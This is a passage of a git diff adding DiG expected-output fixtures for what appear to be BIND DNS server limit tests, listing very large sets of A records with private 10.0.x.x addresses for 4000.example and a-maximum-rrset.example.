+4000.example. 5M IN A 10.0.13.140 +4000.example. 5M IN A 10.0.13.141 +4000.example. 5M IN A 10.0.13.142 +4000.example. 5M IN A 10.0.13.143 +4000.example. 5M IN A 10.0.13.144 +4000.example. 5M IN A 10.0.13.145 +4000.example. 5M IN A 10.0.13.146 +4000.example. 5M IN A 10.0.13.147 +4000.example. 5M IN A 10.0.13.148 +4000.example. 5M IN A 10.0.13.149 +4000.example. 5M IN A 10.0.13.150 +4000.example. 5M IN A 10.0.13.151 +4000.example. 5M IN A 10.0.13.152 +4000.example. 5M IN A 10.0.13.153 +4000.example. 5M IN A 10.0.13.154 +4000.example. 5M IN A 10.0.13.155 +4000.example. 5M IN A 10.0.13.156 +4000.example. 5M IN A 10.0.13.157 +4000.example. 5M IN A 10.0.13.158 +4000.example. 5M IN A 10.0.13.159 +4000.example. 5M IN A 10.0.13.160 +4000.example. 5M IN A 10.0.13.161 +4000.example. 5M IN A 10.0.13.162 +4000.example. 5M IN A 10.0.13.163 +4000.example. 5M IN A 10.0.13.164 +4000.example. 5M IN A 10.0.13.165 +4000.example. 5M IN A 10.0.13.166 +4000.example. 5M IN A 10.0.13.167 +4000.example. 5M IN A 10.0.13.168 +4000.example. 5M IN A 10.0.13.169 +4000.example. 5M IN A 10.0.13.170 +4000.example. 5M IN A 10.0.13.171 +4000.example. 5M IN A 10.0.13.172 +4000.example. 5M IN A 10.0.13.173 +4000.example. 
5M IN A 10.0.13.174 +4000.example. 5M IN A 10.0.13.175 +4000.example. 5M IN A 10.0.13.176 +4000.example. 5M IN A 10.0.13.177 +4000.example. 5M IN A 10.0.13.178 +4000.example. 5M IN A 10.0.13.179 +4000.example. 5M IN A 10.0.13.180 +4000.example. 5M IN A 10.0.13.181 +4000.example. 5M IN A 10.0.13.182 +4000.example. 5M IN A 10.0.13.183 +4000.example. 5M IN A 10.0.13.184 +4000.example. 5M IN A 10.0.13.185 +4000.example. 5M IN A 10.0.13.186 +4000.example. 5M IN A 10.0.13.187 +4000.example. 5M IN A 10.0.13.188 +4000.example. 5M IN A 10.0.13.189 +4000.example. 5M IN A 10.0.13.190 +4000.example. 5M IN A 10.0.13.191 +4000.example. 5M IN A 10.0.13.192 +4000.example. 5M IN A 10.0.13.193 +4000.example. 5M IN A 10.0.13.194 +4000.example. 5M IN A 10.0.13.195 +4000.example. 5M IN A 10.0.13.196 +4000.example. 5M IN A 10.0.13.197 +4000.example. 5M IN A 10.0.13.198 +4000.example. 5M IN A 10.0.13.199 +4000.example. 5M IN A 10.0.13.200 +4000.example. 5M IN A 10.0.13.201 +4000.example. 5M IN A 10.0.13.202 +4000.example. 5M IN A 10.0.13.203 +4000.example. 5M IN A 10.0.13.204 +4000.example. 5M IN A 10.0.13.205 +4000.example. 5M IN A 10.0.13.206 +4000.example. 5M IN A 10.0.13.207 +4000.example. 5M IN A 10.0.13.208 +4000.example. 5M IN A 10.0.13.209 +4000.example. 5M IN A 10.0.13.210 +4000.example. 5M IN A 10.0.13.211 +4000.example. 5M IN A 10.0.13.212 +4000.example. 5M IN A 10.0.13.213 +4000.example. 5M IN A 10.0.13.214 +4000.example. 5M IN A 10.0.13.215 +4000.example. 5M IN A 10.0.13.216 +4000.example. 5M IN A 10.0.13.217 +4000.example. 5M IN A 10.0.13.218 +4000.example. 5M IN A 10.0.13.219 +4000.example. 5M IN A 10.0.13.220 +4000.example. 5M IN A 10.0.13.221 +4000.example. 5M IN A 10.0.13.222 +4000.example. 5M IN A 10.0.13.223 +4000.example. 5M IN A 10.0.13.224 +4000.example. 5M IN A 10.0.13.225 +4000.example. 5M IN A 10.0.13.226 +4000.example. 5M IN A 10.0.13.227 +4000.example. 5M IN A 10.0.13.228 +4000.example. 5M IN A 10.0.13.229 +4000.example. 5M IN A 10.0.13.230 +4000.example. 
5M IN A 10.0.13.231 +4000.example. 5M IN A 10.0.13.232 +4000.example. 5M IN A 10.0.13.233 +4000.example. 5M IN A 10.0.13.234 +4000.example. 5M IN A 10.0.13.235 +4000.example. 5M IN A 10.0.13.236 +4000.example. 5M IN A 10.0.13.237 +4000.example. 5M IN A 10.0.13.238 +4000.example. 5M IN A 10.0.13.239 +4000.example. 5M IN A 10.0.13.240 +4000.example. 5M IN A 10.0.13.241 +4000.example. 5M IN A 10.0.13.242 +4000.example. 5M IN A 10.0.13.243 +4000.example. 5M IN A 10.0.13.244 +4000.example. 5M IN A 10.0.13.245 +4000.example. 5M IN A 10.0.13.246 +4000.example. 5M IN A 10.0.13.247 +4000.example. 5M IN A 10.0.13.248 +4000.example. 5M IN A 10.0.13.249 +4000.example. 5M IN A 10.0.13.250 +4000.example. 5M IN A 10.0.13.251 +4000.example. 5M IN A 10.0.13.252 +4000.example. 5M IN A 10.0.13.253 +4000.example. 5M IN A 10.0.13.254 +4000.example. 5M IN A 10.0.13.255 +4000.example. 5M IN A 10.0.14.0 +4000.example. 5M IN A 10.0.14.1 +4000.example. 5M IN A 10.0.14.2 +4000.example. 5M IN A 10.0.14.3 +4000.example. 5M IN A 10.0.14.4 +4000.example. 5M IN A 10.0.14.5 +4000.example. 5M IN A 10.0.14.6 +4000.example. 5M IN A 10.0.14.7 +4000.example. 5M IN A 10.0.14.8 +4000.example. 5M IN A 10.0.14.9 +4000.example. 5M IN A 10.0.14.10 +4000.example. 5M IN A 10.0.14.11 +4000.example. 5M IN A 10.0.14.12 +4000.example. 5M IN A 10.0.14.13 +4000.example. 5M IN A 10.0.14.14 +4000.example. 5M IN A 10.0.14.15 +4000.example. 5M IN A 10.0.14.16 +4000.example. 5M IN A 10.0.14.17 +4000.example. 5M IN A 10.0.14.18 +4000.example. 5M IN A 10.0.14.19 +4000.example. 5M IN A 10.0.14.20 +4000.example. 5M IN A 10.0.14.21 +4000.example. 5M IN A 10.0.14.22 +4000.example. 5M IN A 10.0.14.23 +4000.example. 5M IN A 10.0.14.24 +4000.example. 5M IN A 10.0.14.25 +4000.example. 5M IN A 10.0.14.26 +4000.example. 5M IN A 10.0.14.27 +4000.example. 5M IN A 10.0.14.28 +4000.example. 5M IN A 10.0.14.29 +4000.example. 5M IN A 10.0.14.30 +4000.example. 5M IN A 10.0.14.31 +4000.example. 5M IN A 10.0.14.32 +4000.example. 
5M IN A 10.0.14.33 +4000.example. 5M IN A 10.0.14.34 +4000.example. 5M IN A 10.0.14.35 +4000.example. 5M IN A 10.0.14.36 +4000.example. 5M IN A 10.0.14.37 +4000.example. 5M IN A 10.0.14.38 +4000.example. 5M IN A 10.0.14.39 +4000.example. 5M IN A 10.0.14.40 +4000.example. 5M IN A 10.0.14.41 +4000.example. 5M IN A 10.0.14.42 +4000.example. 5M IN A 10.0.14.43 +4000.example. 5M IN A 10.0.14.44 +4000.example. 5M IN A 10.0.14.45 +4000.example. 5M IN A 10.0.14.46 +4000.example. 5M IN A 10.0.14.47 +4000.example. 5M IN A 10.0.14.48 +4000.example. 5M IN A 10.0.14.49 +4000.example. 5M IN A 10.0.14.50 +4000.example. 5M IN A 10.0.14.51 +4000.example. 5M IN A 10.0.14.52 +4000.example. 5M IN A 10.0.14.53 +4000.example. 5M IN A 10.0.14.54 +4000.example. 5M IN A 10.0.14.55 +4000.example. 5M IN A 10.0.14.56 +4000.example. 5M IN A 10.0.14.57 +4000.example. 5M IN A 10.0.14.58 +4000.example. 5M IN A 10.0.14.59 +4000.example. 5M IN A 10.0.14.60 +4000.example. 5M IN A 10.0.14.61 +4000.example. 5M IN A 10.0.14.62 +4000.example. 5M IN A 10.0.14.63 +4000.example. 5M IN A 10.0.14.64 +4000.example. 5M IN A 10.0.14.65 +4000.example. 5M IN A 10.0.14.66 +4000.example. 5M IN A 10.0.14.67 +4000.example. 5M IN A 10.0.14.68 +4000.example. 5M IN A 10.0.14.69 +4000.example. 5M IN A 10.0.14.70 +4000.example. 5M IN A 10.0.14.71 +4000.example. 5M IN A 10.0.14.72 +4000.example. 5M IN A 10.0.14.73 +4000.example. 5M IN A 10.0.14.74 +4000.example. 5M IN A 10.0.14.75 +4000.example. 5M IN A 10.0.14.76 +4000.example. 5M IN A 10.0.14.77 +4000.example. 5M IN A 10.0.14.78 +4000.example. 5M IN A 10.0.14.79 +4000.example. 5M IN A 10.0.14.80 +4000.example. 5M IN A 10.0.14.81 +4000.example. 5M IN A 10.0.14.82 +4000.example. 5M IN A 10.0.14.83 +4000.example. 5M IN A 10.0.14.84 +4000.example. 5M IN A 10.0.14.85 +4000.example. 5M IN A 10.0.14.86 +4000.example. 5M IN A 10.0.14.87 +4000.example. 5M IN A 10.0.14.88 +4000.example. 5M IN A 10.0.14.89 +4000.example. 5M IN A 10.0.14.90 +4000.example. 
5M IN A 10.0.14.91 +4000.example. 5M IN A 10.0.14.92 +4000.example. 5M IN A 10.0.14.93 +4000.example. 5M IN A 10.0.14.94 +4000.example. 5M IN A 10.0.14.95 +4000.example. 5M IN A 10.0.14.96 +4000.example. 5M IN A 10.0.14.97 +4000.example. 5M IN A 10.0.14.98 +4000.example. 5M IN A 10.0.14.99 +4000.example. 5M IN A 10.0.14.100 +4000.example. 5M IN A 10.0.14.101 +4000.example. 5M IN A 10.0.14.102 +4000.example. 5M IN A 10.0.14.103 +4000.example. 5M IN A 10.0.14.104 +4000.example. 5M IN A 10.0.14.105 +4000.example. 5M IN A 10.0.14.106 +4000.example. 5M IN A 10.0.14.107 +4000.example. 5M IN A 10.0.14.108 +4000.example. 5M IN A 10.0.14.109 +4000.example. 5M IN A 10.0.14.110 +4000.example. 5M IN A 10.0.14.111 +4000.example. 5M IN A 10.0.14.112 +4000.example. 5M IN A 10.0.14.113 +4000.example. 5M IN A 10.0.14.114 +4000.example. 5M IN A 10.0.14.115 +4000.example. 5M IN A 10.0.14.116 +4000.example. 5M IN A 10.0.14.117 +4000.example. 5M IN A 10.0.14.118 +4000.example. 5M IN A 10.0.14.119 +4000.example. 5M IN A 10.0.14.120 +4000.example. 5M IN A 10.0.14.121 +4000.example. 5M IN A 10.0.14.122 +4000.example. 5M IN A 10.0.14.123 +4000.example. 5M IN A 10.0.14.124 +4000.example. 5M IN A 10.0.14.125 +4000.example. 5M IN A 10.0.14.126 +4000.example. 5M IN A 10.0.14.127 +4000.example. 5M IN A 10.0.14.128 +4000.example. 5M IN A 10.0.14.129 +4000.example. 5M IN A 10.0.14.130 +4000.example. 5M IN A 10.0.14.131 +4000.example. 5M IN A 10.0.14.132 +4000.example. 5M IN A 10.0.14.133 +4000.example. 5M IN A 10.0.14.134 +4000.example. 5M IN A 10.0.14.135 +4000.example. 5M IN A 10.0.14.136 +4000.example. 5M IN A 10.0.14.137 +4000.example. 5M IN A 10.0.14.138 +4000.example. 5M IN A 10.0.14.139 +4000.example. 5M IN A 10.0.14.140 +4000.example. 5M IN A 10.0.14.141 +4000.example. 5M IN A 10.0.14.142 +4000.example. 5M IN A 10.0.14.143 +4000.example. 5M IN A 10.0.14.144 +4000.example. 5M IN A 10.0.14.145 +4000.example. 5M IN A 10.0.14.146 +4000.example. 5M IN A 10.0.14.147 +4000.example. 
5M IN A 10.0.14.148 +4000.example. 5M IN A 10.0.14.149 +4000.example. 5M IN A 10.0.14.150 +4000.example. 5M IN A 10.0.14.151 +4000.example. 5M IN A 10.0.14.152 +4000.example. 5M IN A 10.0.14.153 +4000.example. 5M IN A 10.0.14.154 +4000.example. 5M IN A 10.0.14.155 +4000.example. 5M IN A 10.0.14.156 +4000.example. 5M IN A 10.0.14.157 +4000.example. 5M IN A 10.0.14.158 +4000.example. 5M IN A 10.0.14.159 +4000.example. 5M IN A 10.0.14.160 +4000.example. 5M IN A 10.0.14.161 +4000.example. 5M IN A 10.0.14.162 +4000.example. 5M IN A 10.0.14.163 +4000.example. 5M IN A 10.0.14.164 +4000.example. 5M IN A 10.0.14.165 +4000.example. 5M IN A 10.0.14.166 +4000.example. 5M IN A 10.0.14.167 +4000.example. 5M IN A 10.0.14.168 +4000.example. 5M IN A 10.0.14.169 +4000.example. 5M IN A 10.0.14.170 +4000.example. 5M IN A 10.0.14.171 +4000.example. 5M IN A 10.0.14.172 +4000.example. 5M IN A 10.0.14.173 +4000.example. 5M IN A 10.0.14.174 +4000.example. 5M IN A 10.0.14.175 +4000.example. 5M IN A 10.0.14.176 +4000.example. 5M IN A 10.0.14.177 +4000.example. 5M IN A 10.0.14.178 +4000.example. 5M IN A 10.0.14.179 +4000.example. 5M IN A 10.0.14.180 +4000.example. 5M IN A 10.0.14.181 +4000.example. 5M IN A 10.0.14.182 +4000.example. 5M IN A 10.0.14.183 +4000.example. 5M IN A 10.0.14.184 +4000.example. 5M IN A 10.0.14.185 +4000.example. 5M IN A 10.0.14.186 +4000.example. 5M IN A 10.0.14.187 +4000.example. 5M IN A 10.0.14.188 +4000.example. 5M IN A 10.0.14.189 +4000.example. 5M IN A 10.0.14.190 +4000.example. 5M IN A 10.0.14.191 +4000.example. 5M IN A 10.0.14.192 +4000.example. 5M IN A 10.0.14.193 +4000.example. 5M IN A 10.0.14.194 +4000.example. 5M IN A 10.0.14.195 +4000.example. 5M IN A 10.0.14.196 +4000.example. 5M IN A 10.0.14.197 +4000.example. 5M IN A 10.0.14.198 +4000.example. 5M IN A 10.0.14.199 +4000.example. 5M IN A 10.0.14.200 +4000.example. 5M IN A 10.0.14.201 +4000.example. 5M IN A 10.0.14.202 +4000.example. 5M IN A 10.0.14.203 +4000.example. 5M IN A 10.0.14.204 +4000.example. 
5M IN A 10.0.14.205 +4000.example. 5M IN A 10.0.14.206 +4000.example. 5M IN A 10.0.14.207 +4000.example. 5M IN A 10.0.14.208 +4000.example. 5M IN A 10.0.14.209 +4000.example. 5M IN A 10.0.14.210 +4000.example. 5M IN A 10.0.14.211 +4000.example. 5M IN A 10.0.14.212 +4000.example. 5M IN A 10.0.14.213 +4000.example. 5M IN A 10.0.14.214 +4000.example. 5M IN A 10.0.14.215 +4000.example. 5M IN A 10.0.14.216 +4000.example. 5M IN A 10.0.14.217 +4000.example. 5M IN A 10.0.14.218 +4000.example. 5M IN A 10.0.14.219 +4000.example. 5M IN A 10.0.14.220 +4000.example. 5M IN A 10.0.14.221 +4000.example. 5M IN A 10.0.14.222 +4000.example. 5M IN A 10.0.14.223 +4000.example. 5M IN A 10.0.14.224 +4000.example. 5M IN A 10.0.14.225 +4000.example. 5M IN A 10.0.14.226 +4000.example. 5M IN A 10.0.14.227 +4000.example. 5M IN A 10.0.14.228 +4000.example. 5M IN A 10.0.14.229 +4000.example. 5M IN A 10.0.14.230 +4000.example. 5M IN A 10.0.14.231 +4000.example. 5M IN A 10.0.14.232 +4000.example. 5M IN A 10.0.14.233 +4000.example. 5M IN A 10.0.14.234 +4000.example. 5M IN A 10.0.14.235 +4000.example. 5M IN A 10.0.14.236 +4000.example. 5M IN A 10.0.14.237 +4000.example. 5M IN A 10.0.14.238 +4000.example. 5M IN A 10.0.14.239 +4000.example. 5M IN A 10.0.14.240 +4000.example. 5M IN A 10.0.14.241 +4000.example. 5M IN A 10.0.14.242 +4000.example. 5M IN A 10.0.14.243 +4000.example. 5M IN A 10.0.14.244 +4000.example. 5M IN A 10.0.14.245 +4000.example. 5M IN A 10.0.14.246 +4000.example. 5M IN A 10.0.14.247 +4000.example. 5M IN A 10.0.14.248 +4000.example. 5M IN A 10.0.14.249 +4000.example. 5M IN A 10.0.14.250 +4000.example. 5M IN A 10.0.14.251 +4000.example. 5M IN A 10.0.14.252 +4000.example. 5M IN A 10.0.14.253 +4000.example. 5M IN A 10.0.14.254 +4000.example. 5M IN A 10.0.14.255 +4000.example. 5M IN A 10.0.15.0 +4000.example. 5M IN A 10.0.15.1 +4000.example. 5M IN A 10.0.15.2 +4000.example. 5M IN A 10.0.15.3 +4000.example. 5M IN A 10.0.15.4 +4000.example. 5M IN A 10.0.15.5 +4000.example. 
5M IN A 10.0.15.6 +4000.example. 5M IN A 10.0.15.7 +4000.example. 5M IN A 10.0.15.8 +4000.example. 5M IN A 10.0.15.9 +4000.example. 5M IN A 10.0.15.10 +4000.example. 5M IN A 10.0.15.11 +4000.example. 5M IN A 10.0.15.12 +4000.example. 5M IN A 10.0.15.13 +4000.example. 5M IN A 10.0.15.14 +4000.example. 5M IN A 10.0.15.15 +4000.example. 5M IN A 10.0.15.16 +4000.example. 5M IN A 10.0.15.17 +4000.example. 5M IN A 10.0.15.18 +4000.example. 5M IN A 10.0.15.19 +4000.example. 5M IN A 10.0.15.20 +4000.example. 5M IN A 10.0.15.21 +4000.example. 5M IN A 10.0.15.22 +4000.example. 5M IN A 10.0.15.23 +4000.example. 5M IN A 10.0.15.24 +4000.example. 5M IN A 10.0.15.25 +4000.example. 5M IN A 10.0.15.26 +4000.example. 5M IN A 10.0.15.27 +4000.example. 5M IN A 10.0.15.28 +4000.example. 5M IN A 10.0.15.29 +4000.example. 5M IN A 10.0.15.30 +4000.example. 5M IN A 10.0.15.31 +4000.example. 5M IN A 10.0.15.32 +4000.example. 5M IN A 10.0.15.33 +4000.example. 5M IN A 10.0.15.34 +4000.example. 5M IN A 10.0.15.35 +4000.example. 5M IN A 10.0.15.36 +4000.example. 5M IN A 10.0.15.37 +4000.example. 5M IN A 10.0.15.38 +4000.example. 5M IN A 10.0.15.39 +4000.example. 5M IN A 10.0.15.40 +4000.example. 5M IN A 10.0.15.41 +4000.example. 5M IN A 10.0.15.42 +4000.example. 5M IN A 10.0.15.43 +4000.example. 5M IN A 10.0.15.44 +4000.example. 5M IN A 10.0.15.45 +4000.example. 5M IN A 10.0.15.46 +4000.example. 5M IN A 10.0.15.47 +4000.example. 5M IN A 10.0.15.48 +4000.example. 5M IN A 10.0.15.49 +4000.example. 5M IN A 10.0.15.50 +4000.example. 5M IN A 10.0.15.51 +4000.example. 5M IN A 10.0.15.52 +4000.example. 5M IN A 10.0.15.53 +4000.example. 5M IN A 10.0.15.54 +4000.example. 5M IN A 10.0.15.55 +4000.example. 5M IN A 10.0.15.56 +4000.example. 5M IN A 10.0.15.57 +4000.example. 5M IN A 10.0.15.58 +4000.example. 5M IN A 10.0.15.59 +4000.example. 5M IN A 10.0.15.60 +4000.example. 5M IN A 10.0.15.61 +4000.example. 5M IN A 10.0.15.62 +4000.example. 5M IN A 10.0.15.63 +4000.example. 
5M IN A 10.0.15.64 +4000.example. 5M IN A 10.0.15.65 +4000.example. 5M IN A 10.0.15.66 +4000.example. 5M IN A 10.0.15.67 +4000.example. 5M IN A 10.0.15.68 +4000.example. 5M IN A 10.0.15.69 +4000.example. 5M IN A 10.0.15.70 +4000.example. 5M IN A 10.0.15.71 +4000.example. 5M IN A 10.0.15.72 +4000.example. 5M IN A 10.0.15.73 +4000.example. 5M IN A 10.0.15.74 +4000.example. 5M IN A 10.0.15.75 +4000.example. 5M IN A 10.0.15.76 +4000.example. 5M IN A 10.0.15.77 +4000.example. 5M IN A 10.0.15.78 +4000.example. 5M IN A 10.0.15.79 +4000.example. 5M IN A 10.0.15.80 +4000.example. 5M IN A 10.0.15.81 +4000.example. 5M IN A 10.0.15.82 +4000.example. 5M IN A 10.0.15.83 +4000.example. 5M IN A 10.0.15.84 +4000.example. 5M IN A 10.0.15.85 +4000.example. 5M IN A 10.0.15.86 +4000.example. 5M IN A 10.0.15.87 +4000.example. 5M IN A 10.0.15.88 +4000.example. 5M IN A 10.0.15.89 +4000.example. 5M IN A 10.0.15.90 +4000.example. 5M IN A 10.0.15.91 +4000.example. 5M IN A 10.0.15.92 +4000.example. 5M IN A 10.0.15.93 +4000.example. 5M IN A 10.0.15.94 +4000.example. 5M IN A 10.0.15.95 +4000.example. 5M IN A 10.0.15.96 +4000.example. 5M IN A 10.0.15.97 +4000.example. 5M IN A 10.0.15.98 +4000.example. 5M IN A 10.0.15.99 +4000.example. 5M IN A 10.0.15.100 +4000.example. 5M IN A 10.0.15.101 +4000.example. 5M IN A 10.0.15.102 +4000.example. 5M IN A 10.0.15.103 +4000.example. 5M IN A 10.0.15.104 +4000.example. 5M IN A 10.0.15.105 +4000.example. 5M IN A 10.0.15.106 +4000.example. 5M IN A 10.0.15.107 +4000.example. 5M IN A 10.0.15.108 +4000.example. 5M IN A 10.0.15.109 +4000.example. 5M IN A 10.0.15.110 +4000.example. 5M IN A 10.0.15.111 +4000.example. 5M IN A 10.0.15.112 +4000.example. 5M IN A 10.0.15.113 +4000.example. 5M IN A 10.0.15.114 +4000.example. 5M IN A 10.0.15.115 +4000.example. 5M IN A 10.0.15.116 +4000.example. 5M IN A 10.0.15.117 +4000.example. 5M IN A 10.0.15.118 +4000.example. 5M IN A 10.0.15.119 +4000.example. 5M IN A 10.0.15.120 +4000.example. 5M IN A 10.0.15.121 +4000.example. 
5M IN A 10.0.15.122 +4000.example. 5M IN A 10.0.15.123 +4000.example. 5M IN A 10.0.15.124 +4000.example. 5M IN A 10.0.15.125 +4000.example. 5M IN A 10.0.15.126 +4000.example. 5M IN A 10.0.15.127 +4000.example. 5M IN A 10.0.15.128 +4000.example. 5M IN A 10.0.15.129 +4000.example. 5M IN A 10.0.15.130 +4000.example. 5M IN A 10.0.15.131 +4000.example. 5M IN A 10.0.15.132 +4000.example. 5M IN A 10.0.15.133 +4000.example. 5M IN A 10.0.15.134 +4000.example. 5M IN A 10.0.15.135 +4000.example. 5M IN A 10.0.15.136 +4000.example. 5M IN A 10.0.15.137 +4000.example. 5M IN A 10.0.15.138 +4000.example. 5M IN A 10.0.15.139 +4000.example. 5M IN A 10.0.15.140 +4000.example. 5M IN A 10.0.15.141 +4000.example. 5M IN A 10.0.15.142 +4000.example. 5M IN A 10.0.15.143 +4000.example. 5M IN A 10.0.15.144 +4000.example. 5M IN A 10.0.15.145 +4000.example. 5M IN A 10.0.15.146 +4000.example. 5M IN A 10.0.15.147 +4000.example. 5M IN A 10.0.15.148 +4000.example. 5M IN A 10.0.15.149 +4000.example. 5M IN A 10.0.15.150 +4000.example. 5M IN A 10.0.15.151 +4000.example. 5M IN A 10.0.15.152 +4000.example. 5M IN A 10.0.15.153 +4000.example. 5M IN A 10.0.15.154 +4000.example. 5M IN A 10.0.15.155 +4000.example. 5M IN A 10.0.15.156 +4000.example. 5M IN A 10.0.15.157 +4000.example. 5M IN A 10.0.15.158 +4000.example. 5M IN A 10.0.15.159 + +;; AUTHORITY SECTION: +example. 5M IN NS ns1.example. + +;; ADDITIONAL SECTION: +ns1.example. 5M IN A 10.53.0.1 + +;; Total query time: 279 msec +;; FROM: draco to SERVER: 10.53.0.1 +;; WHEN: Fri Jun 23 12:58:20 2000 +;; MSG SIZE sent: 30 rcvd: 64068 + diff --git a/bin/tests/system/limits/knowngood.dig.out.a-maximum-rrset b/bin/tests/system/limits/knowngood.dig.out.a-maximum-rrset new file mode 100644 index 0000000..1688e83 --- /dev/null +++ b/bin/tests/system/limits/knowngood.dig.out.a-maximum-rrset 
@@ -0,0 +1,4114 @@ + +; <<>> DiG 8.2 <<>> a-maximum-rrset.example. @10.53.0.1 a -p +; (1 server found) +;; res options: init recurs defnam dnsrch +;; got answer: +;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 6 +;; flags: qr aa rd ad; QUERY: 1, ANSWER: 4091, AUTHORITY: 1, ADDITIONAL: 1 +;; QUERY SECTION: +;; a-maximum-rrset.example, type = A, class = IN + +;; ANSWER SECTION: +a-maximum-rrset.example. 5M IN A 10.0.0.0 +a-maximum-rrset.example. 5M IN A 10.0.0.1 +a-maximum-rrset.example. 5M IN A 10.0.0.2 +a-maximum-rrset.example. 5M IN A 10.0.0.3 +a-maximum-rrset.example. 5M IN A 10.0.0.4 +a-maximum-rrset.example. 5M IN A 10.0.0.5 +a-maximum-rrset.example. 5M IN A 10.0.0.6 +a-maximum-rrset.example. 5M IN A 10.0.0.7 +a-maximum-rrset.example. 5M IN A 10.0.0.8 +a-maximum-rrset.example. 5M IN A 10.0.0.9 +a-maximum-rrset.example. 5M IN A 10.0.0.10 +a-maximum-rrset.example. 5M IN A 10.0.0.11 +a-maximum-rrset.example. 5M IN A 10.0.0.12 +a-maximum-rrset.example. 5M IN A 10.0.0.13 +a-maximum-rrset.example. 5M IN A 10.0.0.14 +a-maximum-rrset.example. 5M IN A 10.0.0.15 +a-maximum-rrset.example. 5M IN A 10.0.0.16 +a-maximum-rrset.example. 5M IN A 10.0.0.17 +a-maximum-rrset.example. 5M IN A 10.0.0.18 +a-maximum-rrset.example. 5M IN A 10.0.0.19 +a-maximum-rrset.example. 5M IN A 10.0.0.20 +a-maximum-rrset.example. 5M IN A 10.0.0.21 +a-maximum-rrset.example. 5M IN A 10.0.0.22 +a-maximum-rrset.example. 5M IN A 10.0.0.23 +a-maximum-rrset.example. 5M IN A 10.0.0.24 +a-maximum-rrset.example. 5M IN A 10.0.0.25 +a-maximum-rrset.example. 5M IN A 10.0.0.26 +a-maximum-rrset.example. 5M IN A 10.0.0.27 +a-maximum-rrset.example. 5M IN A 10.0.0.28 +a-maximum-rrset.example. 5M IN A 10.0.0.29 +a-maximum-rrset.example. 5M IN A 10.0.0.30 +a-maximum-rrset.example. 5M IN A 10.0.0.31 +a-maximum-rrset.example. 5M IN A 10.0.0.32 +a-maximum-rrset.example. 5M IN A 10.0.0.33 +a-maximum-rrset.example. 5M IN A 10.0.0.34 +a-maximum-rrset.example. 5M IN A 10.0.0.35 +a-maximum-rrset.example. 
5M IN A 10.0.0.36 +a-maximum-rrset.example. 5M IN A 10.0.0.37 +a-maximum-rrset.example. 5M IN A 10.0.0.38 +a-maximum-rrset.example. 5M IN A 10.0.0.39 +a-maximum-rrset.example. 5M IN A 10.0.0.40 +a-maximum-rrset.example. 5M IN A 10.0.0.41 +a-maximum-rrset.example. 5M IN A 10.0.0.42 +a-maximum-rrset.example. 5M IN A 10.0.0.43 +a-maximum-rrset.example. 5M IN A 10.0.0.44 +a-maximum-rrset.example. 5M IN A 10.0.0.45 +a-maximum-rrset.example. 5M IN A 10.0.0.46 +a-maximum-rrset.example. 5M IN A 10.0.0.47 +a-maximum-rrset.example. 5M IN A 10.0.0.48 +a-maximum-rrset.example. 5M IN A 10.0.0.49 +a-maximum-rrset.example. 5M IN A 10.0.0.50 +a-maximum-rrset.example. 5M IN A 10.0.0.51 +a-maximum-rrset.example. 5M IN A 10.0.0.52 +a-maximum-rrset.example. 5M IN A 10.0.0.53 +a-maximum-rrset.example. 5M IN A 10.0.0.54 +a-maximum-rrset.example. 5M IN A 10.0.0.55 +a-maximum-rrset.example. 5M IN A 10.0.0.56 +a-maximum-rrset.example. 5M IN A 10.0.0.57 +a-maximum-rrset.example. 5M IN A 10.0.0.58 +a-maximum-rrset.example. 5M IN A 10.0.0.59 +a-maximum-rrset.example. 5M IN A 10.0.0.60 +a-maximum-rrset.example. 5M IN A 10.0.0.61 +a-maximum-rrset.example. 5M IN A 10.0.0.62 +a-maximum-rrset.example. 5M IN A 10.0.0.63 +a-maximum-rrset.example. 5M IN A 10.0.0.64 +a-maximum-rrset.example. 5M IN A 10.0.0.65 +a-maximum-rrset.example. 5M IN A 10.0.0.66 +a-maximum-rrset.example. 5M IN A 10.0.0.67 +a-maximum-rrset.example. 5M IN A 10.0.0.68 +a-maximum-rrset.example. 5M IN A 10.0.0.69 +a-maximum-rrset.example. 5M IN A 10.0.0.70 +a-maximum-rrset.example. 5M IN A 10.0.0.71 +a-maximum-rrset.example. 5M IN A 10.0.0.72 +a-maximum-rrset.example. 5M IN A 10.0.0.73 +a-maximum-rrset.example. 5M IN A 10.0.0.74 +a-maximum-rrset.example. 5M IN A 10.0.0.75 +a-maximum-rrset.example. 5M IN A 10.0.0.76 +a-maximum-rrset.example. 5M IN A 10.0.0.77 +a-maximum-rrset.example. 5M IN A 10.0.0.78 +a-maximum-rrset.example. 5M IN A 10.0.0.79 +a-maximum-rrset.example. 5M IN A 10.0.0.80 +a-maximum-rrset.example. 
5M IN A 10.0.0.81 +a-maximum-rrset.example. 5M IN A 10.0.0.82 +a-maximum-rrset.example. 5M IN A 10.0.0.83 +a-maximum-rrset.example. 5M IN A 10.0.0.84 +a-maximum-rrset.example. 5M IN A 10.0.0.85 +a-maximum-rrset.example. 5M IN A 10.0.0.86 +a-maximum-rrset.example. 5M IN A 10.0.0.87 +a-maximum-rrset.example. 5M IN A 10.0.0.88 +a-maximum-rrset.example. 5M IN A 10.0.0.89 +a-maximum-rrset.example. 5M IN A 10.0.0.90 +a-maximum-rrset.example. 5M IN A 10.0.0.91 +a-maximum-rrset.example. 5M IN A 10.0.0.92 +a-maximum-rrset.example. 5M IN A 10.0.0.93 +a-maximum-rrset.example. 5M IN A 10.0.0.94 +a-maximum-rrset.example. 5M IN A 10.0.0.95 +a-maximum-rrset.example. 5M IN A 10.0.0.96 +a-maximum-rrset.example. 5M IN A 10.0.0.97 +a-maximum-rrset.example. 5M IN A 10.0.0.98 +a-maximum-rrset.example. 5M IN A 10.0.0.99 +a-maximum-rrset.example. 5M IN A 10.0.0.100 +a-maximum-rrset.example. 5M IN A 10.0.0.101 +a-maximum-rrset.example. 5M IN A 10.0.0.102 +a-maximum-rrset.example. 5M IN A 10.0.0.103 +a-maximum-rrset.example. 5M IN A 10.0.0.104 +a-maximum-rrset.example. 5M IN A 10.0.0.105 +a-maximum-rrset.example. 5M IN A 10.0.0.106 +a-maximum-rrset.example. 5M IN A 10.0.0.107 +a-maximum-rrset.example. 5M IN A 10.0.0.108 +a-maximum-rrset.example. 5M IN A 10.0.0.109 +a-maximum-rrset.example. 5M IN A 10.0.0.110 +a-maximum-rrset.example. 5M IN A 10.0.0.111 +a-maximum-rrset.example. 5M IN A 10.0.0.112 +a-maximum-rrset.example. 5M IN A 10.0.0.113 +a-maximum-rrset.example. 5M IN A 10.0.0.114 +a-maximum-rrset.example. 5M IN A 10.0.0.115 +a-maximum-rrset.example. 5M IN A 10.0.0.116 +a-maximum-rrset.example. 